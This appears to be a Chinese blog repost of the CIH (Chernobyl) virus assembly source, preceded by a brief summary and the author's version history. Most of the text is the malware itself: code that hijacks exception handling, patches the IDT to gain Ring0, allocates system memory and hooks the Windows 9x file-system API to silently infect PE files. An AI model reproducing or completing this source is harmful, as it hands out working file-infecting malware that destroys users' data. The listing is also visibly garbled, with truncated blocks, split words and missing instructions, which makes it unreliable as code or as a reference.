CIH病毒原码

最新推荐文章于 2024-10-23 21:36:41 发布

ylfnd

最新推荐文章于 2024-10-23 21:36:41 发布

阅读量954

点赞数 1

文章标签： exception system file descriptor application hook

本文深入分析CIH病毒的源代码，详细介绍了CIH病毒的设计者、创建日期及版本信息，并探讨了病毒的主要功能，包括感染PE文件、修改系统异常处理等。此外，还介绍了病毒如何获取Ring0权限并进行系统内存分配。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

CIH病毒原码

文章属性：转载
文章提交：xundi (xundi_at_xfocus.org)

; * The Virus Program Information *
;
****************************************************************************

; * *
; * Designer : CIH Original Place : TTIT of Taiwan *
; * Create Date : 04/26/1998 Now Version : 1.1 *
; * Modification Time : 05/15/1998 *
; * *
;
*==========================================================================*

; * Modification History *
;
*==========================================================================*

; * v1.0 1. Create the Virus P *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Managle that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
;
****************************************************************************

.586P

; ********************************************************************ALSE =
0

DEBUG = TRUE

MajorVirusVersion = 1
MinorVirusVersion = 1

VirusVersion = MajorVirusVersion*10h+MinorVirusVersion

HookExceptionNumber = 03h
FileNameBufferSize = 7fh

; *********************************************************
; *********************************************************

VirusGame SEGMENT

ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame

; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************

MyVirusStart:
push ebp

; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************

lea eax, [esp-04h*2]

xor ebx, ebx
xchg eax, fs:[ebx]

call @0
@0:
pop ebx

lea ecx, StopToRunVirusCode-@0[ebx]
push ecx

push eax

; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************

push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;

add ebx, HookExceptionNumber*08h+04h ; ZF = 0

cli

mov ebp, [ebx] ; Get Exception Base
ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address

pop esi

; *************************************
; * Generate Exception to Get Ring0 *
; *************************************

int HookExceptionNumber ; GenerateException
ReturnAddressOfEndException = $

; *************************************
; * Merge All Virus Code Section *
; *************************************

push esi
mov esi, eax

LoopOfMergeAllVirusCodeSection:

mov ecx, [eax-04h]

rep movsb

sub eax, 08h

mov esi, [eax]

or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1

jmp LoopOfMergeAllVirusCodeSection

QuitLoopOfMergeAllVirusCodeSection:

pop esi

; *************************************
; * Generate Exception Again *
; *************************************

int HookExceptionNumber ; GenerateException Ag
ain

; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************

ReadyRestoreSE:
sti

xor ebx, ebx

jmp RestoreSE

; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************

StopToRunVirusCode:
@1 = StopToRunVirusCode

xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]

RestoreSE:
pop dword ptr fs:[ebx]
pop eax

; *************************************
; * Return Original App to Execute *
; *************************************

pop ebp

push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack

ret ; Re*********************************

MyExceptionHook:
@2 = MyExceptionHook

jz InstallMyFileSystemApiHook

; *************************************
; * Do My Virus Exist in System !? *
; *************************************

mov ecx, dr0
jecxz AllocateSystemMemoryPage

add dword ptr [esp], ReadyRestoreSE-ReturnAddressO
fEndException

; *************************************
; * Return to Ring3 Initial Program *
; *************************************

ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;

iretd

; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************

AllocateSystemMemoryPage:

mov dr0, ebx ; Set the Mark of My Virus Exi
st in System

push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocate
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, and flags
add esp, 08h*04h

xchg edi, eax ; EDI = SystemMemory Start Add
ress

lea eax, MyVirusStart-@2[esi]

iretd ; Return to Ring3 Initial Program

; *************************************
; * Install My File System Api Hook *
; ************************0h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, and flags

mov dr0, eax ; Save OldFileSystemApiHook Ad
dress

pop eax ; EAX = FileSystemApiHook Address

; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx

; Modify IFSMgr_InstallFileSystemApiHook Entry Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax

cli

jmp ExitRing0Init

; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************

CodeSizeOfMergeVirusCodeSection = offset $

; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************

InstallFileSystemApiHook:
push ebx

call @4 ;
@4: ;
pop ebx ; mov ebx, offset FileSystemApiHook
add ebx, FileSystemApiHook-@4 ;

push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, and flags
pop eax

; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx

push eax

; Call Original IFSMgr_InstallFileSystemApiHook
******
; * Static Data *
; *********************************************************

OldInstallFileSystemApiHook dd ?

; *********************************************************
; * IFSMgr_FileSystemHook *
; *********************************************************

; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; ********************************